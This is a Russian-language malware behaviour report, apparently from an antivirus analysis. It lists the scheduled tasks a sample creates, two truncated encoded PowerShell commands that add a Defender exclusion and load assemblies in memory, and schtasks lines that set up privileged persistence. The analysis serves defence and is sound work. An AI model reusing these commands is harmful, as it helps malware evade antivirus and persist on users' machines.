Техническая информация
- <SYSTEM32>\tasks\win update tool
- <SYSTEM32>\tasks\eventlog
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Encoded QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAJABlAG4AdgA6AEEATABMAFUAUwBFAFIAUwBQAFIATwBGAEkATABFAFwAIgAsACIAJABlAG4AdgA6AEEATABMAFUAUwBFAFIA... (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Encoded UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAxADsAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVwBpAG4AMwAyAC4A... (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /create /rl HIGHEST /sc MINUTE /mo 3 /F /tn "Win Update Tool" /tr "cmd.exe /c schtasks /Run /TN EventLog"
- '<SYSTEM32>\schtasks.exe' /Create /rl HIGHEST /F /TN EventLog /TR %ALLUSERSPROFILE%\MobileSelectCache.exe /SC ONEVENT /EC System /MO *[System/EventID=301]
- '<SYSTEM32>\schtasks.exe' /Run /TN EventLog
- '<SYSTEM32>\taskeng.exe' {032F5D82-CB33-4A71-9FD3-51D6BDE9974C} S-1-5-21-3691498038-2086406363-2140527554-1000:vefgvgrgid\user:Interactive:[1]